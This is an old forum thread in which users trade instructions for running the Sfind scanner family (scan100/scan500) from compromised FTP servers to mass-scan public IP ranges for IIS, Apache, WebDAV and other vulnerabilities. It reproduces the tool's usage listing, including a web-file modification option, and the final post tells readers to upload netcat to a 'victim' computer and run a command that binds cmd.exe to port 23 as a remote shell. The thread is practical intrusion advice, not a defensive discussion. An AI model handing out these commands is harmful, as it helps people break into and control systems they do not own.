Devil
Dec 22 2003, 03:18 PM
i was wondering what the comand is for remote scanning with these programms...i heard you can remote scan with them....just cant figure out how!somebody there that can help me out??
thx
Devil
skorpio
Dec 22 2003, 03:34 PM
if u wirte scan100 h ?
or scan100, not screen the istruction ??
Lanig
Dec 22 2003, 03:37 PM
scan100 [parameter] [startip] [endip]
paramter can be replaced by -p for port and other stuff.. (depends on ur sfind version)
to see all the commands just type scan100 like skorpio said
Devil
Dec 22 2003, 03:38 PM
are we talking about the same thing??i can do that a stro with admins rights??
PuPPaFiSH
Dec 22 2003, 06:14 PM
If your trying to do it from your ftp client i.e not a command line you have to do a 'site exec' e.g 'site exec scan100.exe -p <port> <start ip> <end ip>'
Nightdemon
Dec 22 2003, 11:03 PM
there are lots of possible commands. When you start the program, you'll see something like this (maybe a little different due to other version):
| CODE |
=========Modded Sfind========= ========Version 0.921 By MaXxX ========
Usage: scan.exe <Option> <Parameter>
<Option>: -config Threads Set scan speed -p <Port|Port-Port> <IP|IP-IP> Scan port -cgi <IP address> Scan cgi hole -idq <Start IP> <End IP> Scan .idq hole -pri <Start IP> <End IP> Scan .printer hole -apache <Start IP> <End IP> Scan Apache 1.3.x -apache2 <Start IP> <End IP> Scan Apache 2.x -apachechunked <Start IP> <End IP> Scan Apache Win32 Chunked -uni <Start IP> <End IP> Scan unicode hole -webdav <Start IP> <End IP> Scan Webdav hole -real <Start IP> <End IP> Scan RealMedia 8.x/9.x -mdac <Start IP> <End IP> Scan .mdac hole -media <Start IP> <End IP> Scan IIS Media Services -codered <Start IP> <End IP> Scan codered virus host -ftp <Start IP> <End IP> [-admin] -um <IP addr> [Web path] <Message> Modify web files
Example: scan.exe -webdav 192.168.0.1 192.168.0.255 |
now let's say you want to scan this range: 200.0.0.0 - 200.9.255.255
If you wanna scan this range on ppl with port 139 open, you should use this command (and using scan500):
| CODE |
| scan500.exe -p 139 200.0.0.0 200.9.255.255 |
and if you want to scan it on, for example, realserver, you need to write this:
| CODE |
| scan500.exe -real 200.0.0.0 200.9.255.255 |
hope this makes it clear
cyrixx
Dec 22 2003, 11:44 PM
öhhm, one question... has MaXxX a webpage where all new scan-tools can be download (not
http://home.hccnet.nl/m3ssi4h.rul3z/ ) ? i mean an aktuall one...?
Fareway
Dec 23 2003, 12:21 PM
I try to find these tool with google. Unfortunaltelly i have no access to the download section where you can find these tool.
Cyrus
Dec 23 2003, 07:52 PM
| QUOTE (Fareway @ Dec 23 2003, 12:21 PM) |
| I try to find these tool with google. Unfortunaltelly i have no access to the download section where you can find these tool. |
Are u serious?
One post above yours, there is a link
Neo2k
Dec 23 2003, 08:38 PM
| QUOTE (Fareway @ Dec 23 2003, 12:21 PM) |
| I try to find these tool with google. Unfortunaltelly i have no access to the download section where you can find these tool. |
Yeah and there are a Public Download Section with scan 1000 ....
X-FloppY
Dec 23 2003, 10:35 PM
omg the command is
for example:
scan500 -p 1111 193.6.0.0 193.6.255.255
and search google
it's public so you can find it easily
-=4c1d-Rain=-
Dec 24 2003, 01:57 PM
remote scanning can be done from an ftp server with 'site exec' so... manual give the command site exec scan500.exe [parameters]
Be sure to have exec permission on the ftp server.
jimmy
Dec 24 2003, 06:03 PM
ever heard about the -h , - ? , - help function in a commandline tool ? it does a great job if you ask me ...
northernsky
Dec 28 2003, 01:10 AM
The newer versions of scan.exe have variable thread counts, find .91 and up, and it'll let you scan.exe -config (threadcount)
F34R
Dec 31 2003, 03:26 AM
Scan500 works best for me.... since the thread count isn't too much, but isn't too small to the point of slowing to a crawl.
ara2
Jan 6 2004, 10:27 PM
scan1000 seems to lag out a lot of comps, id stick to 100 or 500
muss
Feb 28 2004, 10:50 AM
Hey people. Did anyone have a source code for Sfind or any other program from scan*.exe family ? I'm looking for it very long time and i cant find. Please help me.
babbacool
Mar 1 2004, 09:39 AM
If you want to scan remotely don't use the command site exec with scan100 or scan500. I've got some problem with this method.
Just upload netcat on the computer victim and then type nc -l -p 23 -t -e cmd.exe
will get Netcat listening on port 23 (telnet). When it gets connected to
by a client it will spawn a shell (cmd.exe). The -t option tells Netcat
to handle any telnet negotiation the client might expect.
This will allow you to telnet to the machine you have Netcat listening on
and get a cmd.exe shell when you connect. You could just as well use
Netcat instead of telnet.
And when you close the telnet windows the port 23 is not listening anymore.
Just take your results with serv-u or another ftp client.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.